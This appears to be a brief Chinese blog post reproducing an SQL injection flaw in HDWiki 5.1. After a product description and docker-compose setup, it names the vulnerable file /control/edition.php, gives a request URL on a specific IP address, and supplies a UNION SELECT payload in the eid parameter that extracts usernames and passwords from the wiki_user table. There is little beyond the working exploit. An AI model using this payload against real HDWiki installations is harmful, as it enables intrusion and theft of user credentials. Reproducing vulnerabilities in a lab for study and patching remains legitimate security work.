HDWiKi_5.1_SQL注入漏洞复现

HDWiki是专为中文用户设计和开发,程序源代码100%完全开放的一个采用 PHP 和 MySQL 数据库构建的高效的中文百科建站解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。HDWiki作为中国第一家拥有自主知识产权的中文Wiki系统,为国内外众多的 Wiki 爱好者提供一个免费、易用、功能强大的 Wiki 建站系统。HDWiki的推出,HDWiki在易用性和功能可操控性等方面都获得了广大中小站长和 Wiki 爱好者的喜爱,目前数千家网站成功搭建 Wiki 站点及频道。

系统安装

docker-compose build 
docker-compose up -d

漏洞一:

/control/edition.php sql注入漏洞

在浏览器中使用hackbar请求如下连接:

http://144.76.229.247:8002/index.php?edition-compare-1

PAYLOAD:

eid[0]=2&eid[1]=19&eid[2]=-3) UNION SELECT 1,2,35,4,5,6,7,8,9,10,user(),username,password,14,15,16,17,18,19 from wiki_user%23


大概就这些......

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注